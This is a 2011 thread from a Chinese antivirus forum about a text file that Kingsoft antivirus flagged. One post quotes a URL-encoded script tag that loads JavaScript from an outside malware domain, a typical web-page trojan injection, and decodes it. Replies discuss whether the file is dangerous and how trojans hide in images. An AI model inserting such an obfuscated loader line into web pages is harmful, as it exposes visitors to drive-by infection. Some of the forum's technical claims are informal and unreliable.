楼主: 知微
收起左侧

[金山] 这是怎么回事?正常的txt文件啊,上图上样本。正奇铁军来

  [复制链接]
微微的笑
发表于 2011-3-1 20:38:12 | 显示全部楼层
byxxdrls 发表于 2011-3-1 20:29
回复 8楼 65705960 的帖子

这代码有威胁?
byxxdrls
头像被屏蔽
发表于 2011-3-1 20:42:15 | 显示全部楼层
本帖最后由 byxxdrls 于 2011-3-1 20:44 编辑

回复 11楼 65705960 的帖子

不懂JS。只知道文本文件里有这段:
  1. 01.如图2所示,就发现存在一段挂马代码:<script src=http://%61%76%65%31%2E%63%6E></script>
复制代码

放到浏览器中运行了,真实网址是:
  1. http://ave1.cn/
复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
微微的笑
发表于 2011-3-1 20:55:32 | 显示全部楼层
byxxdrls 发表于 2011-3-1 20:42
回复 11楼 65705960 的帖子

不懂JS。只知道文本文件里有这段:

我知道真实地址, 问题是这个地址已经失效了 =.=
byxxdrls
头像被屏蔽
发表于 2011-3-1 21:00:21 | 显示全部楼层
回复 13楼 65705960 的帖子

哦,是失效了。也许这个域名本来就没有其它用途,只用来挂马,所以网盾没从黑名单中剔除吧。
摸韩摸德
头像被屏蔽
发表于 2011-3-1 21:02:44 | 显示全部楼层
JS代码,放在TXT文档中,是不会启动的。看上去很危险,其实是无效的。
要放在HTML,或者PHP、ASP、JSP里面,才会启动。
毒霸毕竟不是智能的,看到危险就报了,但没有去鉴定TXT、WORD或者PHP、ASP、JSP。
caixx
发表于 2011-3-1 21:11:09 | 显示全部楼层
js脚本。。。
知微
 楼主| 发表于 2011-3-1 21:27:39 | 显示全部楼层
回复 10楼 byxxdrls 的帖子

这是事例。。。。。。。。。。没危害的东西。。。。。。。。。
byxxdrls
头像被屏蔽
发表于 2011-3-1 21:48:29 | 显示全部楼层
回复 15楼 摸韩摸德 的帖子

呵呵,放到图片文件中呢?

我个人觉得要正确判断确实是比较难的。
摸韩摸德
头像被屏蔽
发表于 2011-3-1 22:07:54 | 显示全部楼层
回复 18楼 byxxdrls 的帖子

是啊,木马可以放在GIF图片中(因为GIF图片,有动画格式),其它图片放不了。
所以,杀毒引擎会特别扫描GIF图片。

要正确判断确实是比较难的。
byxxdrls
头像被屏蔽
发表于 2011-3-1 22:12:13 | 显示全部楼层
回复 19楼 摸韩摸德 的帖子

关于这方面的东西,我是小白。所以我更愿意听一听专业人士的回答。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-7 14:29 , Processed in 0.094112 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表